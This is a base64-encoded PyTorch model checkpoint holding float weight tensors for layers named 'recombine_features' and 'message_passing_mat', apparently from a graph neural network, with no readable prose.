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V+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1